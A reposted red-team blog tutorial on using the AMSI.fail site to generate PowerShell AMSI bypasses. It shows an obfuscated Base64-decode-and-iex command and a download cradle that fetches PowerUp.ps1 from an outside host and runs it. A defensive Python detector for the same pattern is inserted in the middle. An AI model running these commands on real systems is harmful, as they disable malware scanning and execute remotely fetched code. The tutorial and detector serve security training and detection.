Hacker Arsenal | AMSI.fail perfectly bypasses AMSI

admin, 4 December 2024, 10:41:40

0-Introduction

[OSCP essential] [OSEP essential] [Real-world essential]

amsi.fail is a go-to tool for generating AMSI bypasses.

1-Name

https://amsi.fail/

2-Source

https://github.com/Flangvik/AMSI.fail

3-Usage

Open https://amsi.fail/, click "Generate Encoded" to produce the encoded PowerShell script, then run it on the target machine to bypass AMSI. Below is an example, personally tested on Windows 10:

[sySTem.tEXT.enCodinG]::UniCodE.gEtSTriNg([SySTEM.COnVeRT]::FROmBASe64StrING("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"))|iex

Whatever is executed afterwards then runs with AMSI bypassed, for example these two commands:

iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))
Invoke-AllChecks
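As an added example that is not part of the original post or of AMSI.fail, here is the defender's side of the chain shown above: a small Python checker that recognises the case-randomised Base64-decode-and-iex pattern in PowerShell script block log text (Event ID 4104 ScriptBlockText) and decodes the payload as UTF-16LE, which is what .NET's Unicode encoding means. The sample script block entries are constructed, with a harmless stand-in payload instead of a generated one.

```python
"""Flag the AMSI.fail-style decode-and-invoke chain in PowerShell script block logs."""
import base64
import re
from typing import Optional

# Apart from randomised letter case and the payload, the chain the post shows is:
#   [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("<b64>")) | iex
# re.IGNORECASE absorbs the case randomisation, so only the structure has to match.
DECODE_INVOKE_RE = re.compile(
    r"Unicode\.GetString\(\s*\[[^\]]*Convert\]::FromBase64String\(\s*['\"]"
    r"([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)


def decode_payload(b64: str) -> Optional[str]:
    """Decode as the chain does: Base64, then UTF-16LE (.NET's 'Unicode' encoding)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # malformed Base64 or odd byte count
        return None


def inspect_script_block(script_text: str) -> dict:
    """Return a finding for one Event ID 4104 ScriptBlockText value."""
    match = DECODE_INVOKE_RE.search(script_text)
    if not match:
        return {"suspicious": False, "decoded": None, "mentions_amsi": False}
    decoded = decode_payload(match.group(1))
    mentions_amsi = decoded is not None and "amsi" in decoded.lower()
    return {"suspicious": True, "decoded": decoded, "mentions_amsi": mentions_amsi}


# Constructed sample data: a harmless stand-in payload wrapped in the same
# case-randomised chain as the post's example, plus one benign admin command.
SAMPLE_PAYLOAD = "Write-Host 'constructed sample that mentions AMSI'"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_SCRIPT_BLOCKS = [
    '[sySTem.tEXT.enCodinG]::UniCodE.gEtSTriNg([SySTEM.COnVeRT]::FROmBASe64StrING("'
    + SAMPLE_B64 + '"))|iex',
    "Get-ChildItem C:\\Users | Where-Object Name -like 'a*'",
]

if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(inspect_script_block(block))
```

The decoded text is what AMSI would have scanned had the chain not been used, so surfacing it in the alert lets an analyst judge the payload directly rather than the wrapper.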

4-Real-world example

Loading PowerUp is blocked:

iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))


Generate the AMSI bypass command and execute it:

https://amsi.fail/


Result of execution: AMSI is bypassed.

Exam tip:

The code from https://amsi.fail/ does not succeed in bypassing every time; if it fails, generate another one and run it again.


Originally published on the WeChat public account 高级红队专家: Hacker Arsenal | AMSI.fail perfectly bypasses AMSI

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Posted by admin on 4 December 2024, 10:41:40. When reposting, please keep this article's link (CN-SEC: thanks to the original author for their effort): https://cn-sec.com/archives/3465810.html